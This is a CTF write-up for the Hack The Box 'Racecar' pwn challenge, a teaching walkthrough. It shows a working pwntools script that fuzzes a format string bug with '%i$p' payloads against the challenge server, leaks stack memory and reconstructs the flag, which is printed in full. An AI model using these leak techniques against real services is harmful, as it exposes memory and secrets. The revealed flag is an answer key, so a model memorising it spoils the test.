Racecar

5KB

archive

CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!

this binary is vulnerable to format string vulnerability and since the flag is declared in the stack we can use the format string vuln to leak the flag out of the stack

┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar

🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
      ______                                       |xxx|
     /|_||_\`.__                                   | F |                                                                             
    (   _    _ _\                                  |xxx|                                                                             
*** =`-(_)--(_)-'                                  | I |                                                                             
                                                   |xxx|                                                                             
                                                   | N |                                                                             
                                                   |xxx|                                                                             
                                                   | I |                                                                             
                                                   |xxx|                                                                             
             _-_-  _/\______\__                    | S |                                                                             
           _-_-__ / ,-. -|-  ,-.`-.                |xxx|                                                                             
            _-_- `( o )----( o )-'                 | H |                                                                             
                   `-'      `-'                    |xxx|                                                                             
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌                                                                             
                                                                                                                                     
Insert your data:                                                                                                                    
                                                                                                                                     
Name: name                                                                                                                           
Nickname: something                                                                                                                  
                                                                                                                                     
[+] Welcome [name]!                                                                                                                  
                                                                                                                                     
[*] Your name is [name] but everybody calls you.. [something]!                                                                       
[*] Current coins: [69]                                                                                                              
                                                                                                                                     
1. Car info                                                                                                                          
2. Car selection                                                                                                                     
> 2                                                                                                                                  
                                                                                                                                     
                                                                                                                                     
Select car:                                                                                                                          
1. 🚗                                                                                                                                
2. 🏎                                                                                                                                 
> 2                                                                                                                                  
                                                                                                                                     
                                                                                                                                     
Select race:                                                                                                                         
1. Highway battle                                                                                                                    
2. Circuit                                                                                                                           
> 1                                                                                                                                  
                                                                                                                                     
[*] Waiting for the race to finish...                                                                                                
                                                                                                                                     
[+] You won the race!! You get 100 coins!                                                                                            
[+] Current coins: [169]                                                                                                             
                                                                                                                                     
[!] Do you have anything to say to the press after your big victory?                                                                 
> %p %p %p %p %p %p %p %p                                                                                                            

The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: 
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1

we don't know the position of the variable that holds the flag value in the stack so we will fuzz the stack and keep leaking until we leak the flag, and to do that we will build a fuzzer script using python

Exploit :

from pwn import *

flag = ''

# Let's fuzz x values
for i in range(100):
    try:
        # Connect to server
        io = remote('83.136.253.251', 42831)
        io.sendlineafter(b'Name: ', b'anas')
        io.sendlineafter(b'Nickname: ', b'something')
        io.sendlineafter(b'> ', b'2')
        io.sendlineafter(b'> ', b'2')
        io.sendlineafter(b'> ', b'1')
        # Format the counter
        # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
        io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
        # Receive the response
        io.recvline()
        io.recvline()
        result = io.recv()
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
            try:
                # Decode, reverse endianess and print
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up flag
                flag += reversed_hex.decode()
            except BaseException:
                pass
    except EOFError:
        pass

# Print and close
info(flag)
io.close()

let's run the fuzzer

┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py

...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}

Flag :

HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}

Previouspwn NextHunting

Last updated 1 year ago

Was this helpful?